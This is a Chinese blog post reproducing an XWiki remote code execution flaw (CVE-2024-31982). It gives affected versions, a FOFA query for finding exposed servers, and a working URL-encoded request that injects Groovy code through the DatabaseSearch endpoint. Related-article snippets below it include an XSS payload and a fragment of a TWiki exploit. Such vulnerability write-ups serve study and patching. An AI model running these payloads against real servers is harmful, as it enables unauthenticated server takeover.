【漏洞复现】XWiki远程代码执⾏漏洞(CVE-2024-31982)

最新推荐文章于 2025-06-03 15:07:06 发布
最新推荐文章于 2025-06-03 15:07:06 发布
阅读量812 收藏 4
点赞数 6
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 渗透测试 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46381222/article/details/143110824

免责声明

请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、简介

XWiki是一个由Java编写的、基于LGPL协议发布的开源Wiki和应用平台。它不仅作为一个协作性Web应用开发平台,还提供了一些构建于其上的打包应用,被称为第二代Wiki。这种开发平台特性允许用户创建复杂的协作式Web应用,满足各种知识管理和协作需求。

二、漏洞描述

XWiki的数据库搜索允许通过搜索⽂本远程执行代码。这允许公共wiki的任何访问者或封闭wiki的用户远程执行代码。

三、影响版本

>= 2.4-milestone-1, < 4.10.20
>= 15.0-rc-1, < 15.5.4
>= 15.6-rc-1, < 15.10-rc-1

四、fofa语法

body="data-xwiki-reference"

五、漏洞复现

poc:/xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20

最低0.47元/天 解锁文章

200万优质内容无限畅学
XWiki DatabaseSearch 远程代码漏洞复现(CVE-2024-31982)
0xSec
06-20 1112
XWiki 14.10.20 之前版本存在远程代码漏洞,改漏洞源于DatabaseSearch 接口代码设置不当缺陷,导致未经身份验证的远程攻击者可以行任意Groovy代码或任意系统指令,从而获取服务器权限。该漏洞利用难度较低,建议受影响用户尽快升级至安全版本。
XWiki SolrSearchMacros 远程代码漏洞复现CVE-2025-24893)(附脚本)
iSee857的博客
02-25 2084
XWiki 平台是一个通用的 wiki 平台,为构建在其上的应用程序提供运行时服务。任何 guest 都可以通过对 'SolrSearch' 的请求来行任意远程代码行。这会影响整个 XWiki 安装的机密性、完整性和可用性。(CVE-2025-24893)
xwiki,新xss漏洞爆发
wei
09-08 238
这回哥就啥也不说了。。第一次发现xwiki官方尚未处理的漏洞,直接去官方校验效果把:) http://www.xwiki.org/xwiki/bin/view/XWiki/SilviaRusu?language=t5x%27t5x"&gt;&lt;script&gt;alert("abc")&lt;/script&gt;   当然也可以来拍拍的API平台测试:)http://pop.pa...
XWiki协同知识管理平台完全指南
最新发布
weixin_36047538的博客
06-03 1100
XWiki 是一个开源的 Java 平台,用于创建和管理企业级文档和应用程序。自2002年首次发布以来,它已经发展成为一个功能丰富且可高度定制的wiki系统,主要目标是提供一个灵活且易于使用的解决方案,以便团队协作和知识共享。XWiki以其强大的扩展性和灵活性受到许多IT企业及社区的青睐。XWiki的可扩展性是其核心优势之一,其架构允许开发者通过插件系统来增加新的功能和特性。XWiki的插件机制允许第三方开发者创建可重用的组件,这些组件可以很容易地集成到XWiki平台中去。
XWiki Annotation Displayer 存在任意代码漏洞CVE-2023-26475)
murphysec的博客
03-09 775
XWiki 是一个开源的企业级 Wiki 平台,Annotation Displayer 是 XWiki 中的一个插件,用于在 XWiki 页面上显示注释和其他相关内容。 该项目受影响版本存在任意代码漏洞,由于Annotation Displayer 对 Groovy 宏的使用没有限制,具有注释编辑权限或者页面编辑权限的攻击者可在注释中注入 Groovy 宏来行任意代码,进而危害系统安全。
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906)复现
玄道的网安博客
03-05 3557
漏洞概述 Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, 18.7, 17.3, 16.4前存在一处逻辑错误,管理员账户被爆破60次以上时将被锁定,此时使用空白密码即可以管理员身份登录后台。 影响版本 Tiki Tiki <21.2 环境搭建 https://github.com/vulhub/vulhub/...
wiki 漏洞文库(跟踪最新漏洞情报,挖洞快人一步)
Blanks的博客
12-22 1938
wiki 漏洞文库(跟踪最新漏洞情报,挖洞快人一步),最新CVE漏洞、OA系统漏洞情报,附加资产收集工具+POC批量验证脚本分享
XWiki SolrSearch接口存在远程命令漏洞CVE-2025-24893
nnn2188185的博客
05-06 246
微信公众号搜索:南风漏洞复现文库该文章 南风漏洞复现文库 公众号首发。
XWiki history接口未授权访问(CVE-2024-45591)(附脚本)
iSee857的博客
02-25 441
XWiki的/ history接口存在未授权访问漏洞,未授权用户可通过该漏洞获取页面的每次修改、修改时间、版本号、修改的作者和版本注释等信息(CVE-2024-45591)
twiki漏洞
cnbird's blog
10-19 1023
# A = m, B = y, C = s, E = d, F = h, G = w, X = / %SEARCH{date="Pour $X='X';$X=~tr#X#\057#;our $A='X';$A=~tr#X#\155#;our %$B='X';$B=~tr#X#\171#;our $C='X';$C=~tr#X#\163#;our %$E='X';$E=~tr#X#\144#;our
【风险预警】Confluence Wiki OGNL注入漏洞CVE-2022-26134)
murphysec的博客
06-04 4677
6月4日,墨菲安全实验室监测发现Atlassian修复了Confluence Server 和 Confluence Data Center 中的OGNL注入漏洞。Atlassian Confluence是企业常用的wiki系统,攻击者无需认证可利用漏洞在Confluence Server 或 Confluence Data Center 系统中行任意代码。CVSS评分为9.8分,评级为严重,按照官方描述该漏洞受影响版本为:所有受支持的 Confluence Server 和 Confluence Dat
Wiki平台 --- XWiki
04-13
NULL 博文链接:https://huangbocom.iteye.com/blog/1732743
Xwiki汉化文件
05-10
一、进入安装目录/xwiki/WEB-INF/lib/下找到xwiki-platform-legacy-oldcore-10.2.jar 二、用zip解压软件进入xwiki-platform-legacy-oldcore-10.2.jar不要解压,找到ApplicationResources_zh.properties 打开以后是ascii码。需要打开cmd进入其所在目录,输入一下命令转码。 native2ascii -reverse ApplicationResources_zh.properties ApplicationResources_zh2.properties 然后就可以改汉化了。改完之后反编码。 注意两次参数和文件名的变化。 native2ascii ApplicationResources_zh2.properties ApplicationResources_zh.properties 最后直接,把ApplicationResources_zh.properties填加到xwiki-platform-legacy-oldcore-10.2.jar把原来的替换掉就可以了
xwiki
hikuru的专栏
09-24 475
刚完成一个xwiki项目,算是有些心得,如果你正好在做xwiki,有什么心得和问题,可以在此留言共同探讨,不保证解决问题,至少有个人可以交流。
漏洞复现】利用禅道系统RCE命令漏洞反弹shell
刘家华(游戏开发)
04-23 2060
禅道系统RCE漏洞复现
python 知识管理系统_xwiki 知识管理系统
weixin_39946429的博客
12-20 832
搭建一个知识管理平台, 用于知识库管理/规范管理, 可以作wiki, 可以将word/excel等导入进去, 支持全文搜索, 可以记周报, 会议纪要.现在有很多文档管理系统, 比如阿里的语雀、腾讯的 TAPD 平台也包括文档管理功能, 但这些系统需要联网的. 企业内文档协作工具不是很多, 最有名是收费的 confluence 了, 禅道有文档管理功能, 但功能较弱, 比较适合附件上传管理.一直...
xwiki[未完成]
weixin_34161032的博客
10-02 112
2019独角兽企业重金招聘Python工程师标准>>> ...
XWiki脚本测试新工具:xwiki-contrib-repl控制台
资源摘要信息:"xwiki-contrib-repl:XWiki中的脚本控制台" XWiki是一个基于Java的开源Wiki应用程序,它支持多种脚本语言,允许用户通过脚本来扩展其功能。在XWiki中,REPL(Read-Eval-Print Loop)是一个交互式编程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值